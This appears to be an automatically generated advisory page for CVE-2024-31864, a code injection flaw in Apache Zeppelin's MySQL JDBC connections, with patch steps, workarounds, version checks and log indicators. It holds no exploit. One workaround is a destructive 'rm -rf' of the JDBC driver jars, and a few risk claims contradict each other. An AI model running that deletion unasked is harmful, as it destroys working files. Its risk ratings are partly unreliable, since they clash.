CVE-2024-31864 – This CVE-2024-31864 is a code injection vulnera... (How to Fix)

Q: What is the severity of CVE-2024-31864?

CVE-2024-31864 has a CVSS score of 9.8 (CRITICAL). This CVE-2024-31864 is a code injection vulnerability in Apache Zeppelin that allows attackers to execute arbitrary code when connecting to MySQL databases via JDBC drivers. It affects all Apache Zeppelin installations before version 0.11.1. Attackers can exploit this to gain unauthorized access, modify data, or compromise the entire Zeppelin server.

📋 TL;DR

This CVE-2024-31864 is a code injection vulnerability in Apache Zeppelin that allows attackers to execute arbitrary code when connecting to MySQL databases via JDBC drivers. It affects all Apache Zeppelin installations before version 0.11.1. Attackers can exploit this to gain unauthorized access, modify data, or compromise the entire Zeppelin server.

💻 Affected Systems

Products:

Apache Zeppelin

Versions: All versions before 0.11.1

Operating Systems: All operating systems running Apache Zeppelin

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability is present when using MySQL JDBC connections. Other database connections may also be affected but MySQL is confirmed.

📦 What is this software?

Zeppelin by Apache

View all CVEs affecting Zeppelin →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete server compromise allowing remote code execution, data theft, privilege escalation, and lateral movement to other systems in the network.

🟠

Likely Case

Unauthorized database access, data exfiltration, and potential execution of malicious code within the Zeppelin environment.

🟢

If Mitigated

Limited impact with proper network segmentation, database access controls, and monitoring in place.

🌐 Internet-Facing: HIGH - Internet-facing Zeppelin instances are directly exploitable without authentication.

🏢 Internal Only: HIGH - Internal instances remain vulnerable to authenticated users or attackers who gain internal network access.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires network access to Zeppelin and ability to configure database connections. The vulnerability is similar to CVE-2020-11974, suggesting exploit patterns may be reused.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.11.1

Vendor Advisory: https://lists.apache.org/thread/752qdk0rnkd9nqtornz734zwb7xdwcdb

Restart Required: Yes

Instructions:

1. Backup all Zeppelin notebooks and configurations. 2. Stop the Zeppelin service. 3. Download Apache Zeppelin 0.11.1 from the official website. 4. Replace the existing installation with version 0.11.1. 5. Restore configurations and notebooks. 6. Start the Zeppelin service. 7. Verify the version is 0.11.1.

🔧 Temporary Workarounds

Restrict Database Connections

linux

Limit Zeppelin's ability to connect to external databases by removing JDBC drivers and restricting network access.

sudo rm -rf /path/to/zeppelin/interpreter/jdbc/*.jar
sudo iptables -A OUTPUT -p tcp --dport 3306 -j DROP

Network Segmentation

all

Isolate Zeppelin instances from production databases and restrict access to trusted IPs only.

🧯 If You Can't Patch

Disable all JDBC interpreter connections in Zeppelin configuration
Implement strict network access controls to limit Zeppelin's database connectivity

🔍 How to Verify

Check if Vulnerable:

Check Zeppelin version via web interface or configuration files. If version is below 0.11.1, the system is vulnerable.

Check Version:

grep 'zeppelin.version' /path/to/zeppelin/conf/zeppelin-site.xml || cat /path/to/zeppelin/VERSION

Verify Fix Applied:

After upgrade, verify version is 0.11.1 and test MySQL JDBC connections with safe test queries.

📡 Detection & Monitoring

Log Indicators:

Unusual JDBC connection attempts
Malformed SQL queries in Zeppelin logs
Unexpected interpreter process creation

Network Indicators:

Zeppelin server making unexpected outbound connections to databases
Unusual traffic patterns on MySQL port 3306

SIEM Query:

source="zeppelin.logs" AND ("jdbc" OR "mysql") AND ("error" OR "exception" OR "injection")

📊 Metadata

CVE ID: CVE-2024-31864

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-94

Published: April 9, 2024

Last Updated: November 4, 2025

🔗 References

http://www.openwall.com/lists/oss-security/2024/04/09/8 Mailing List
https://github.com/apache/zeppelin/pull/4709 Issue Tracking
https://lists.apache.org/thread/752qdk0rnkd9nqtornz734zwb7xdwcdb Mailing List,Vendor Advisory
https://www.cve.org/CVERecord?id=CVE-2020-11974 Not Applicable
http://www.openwall.com/lists/oss-security/2024/04/09/8 Mailing List
http://www.openwall.com/lists/oss-security/2025/08/03/3
https://github.com/apache/zeppelin/pull/4709 Issue Tracking
https://lists.apache.org/thread/752qdk0rnkd9nqtornz734zwb7xdwcdb Mailing List,Vendor Advisory
https://www.cve.org/CVERecord?id=CVE-2020-11974 Not Applicable

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-31864, you might also want to check these: